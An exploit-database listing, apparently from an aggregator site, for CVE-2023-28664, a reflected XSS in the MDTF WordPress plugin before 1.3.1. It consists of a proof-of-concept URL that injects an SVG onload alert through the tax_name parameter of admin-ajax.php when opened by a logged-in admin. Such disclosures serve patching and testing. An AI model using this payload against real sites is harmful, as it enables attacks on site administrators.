Exploit for MDTF < 1.3.1 - Reflected XSS CVE-2023-28664

Name: Exploit for MDTF < 1.3.1 - Reflected XSS CVE-2023-28664
Rating: 5 (40 reviews)

2023-03-22 | CVSS 4.9

## https://sploitus.com/exploit?id=WPEX-ID:23412462-005F-45B5-9C7A-6473B7FA3AC7
Make a logged in admin open https://example.com/wp-admin/admin-ajax.php?action=mdf_get_tax_options_in_widget&tax_name=<svg/onload=alert(1)>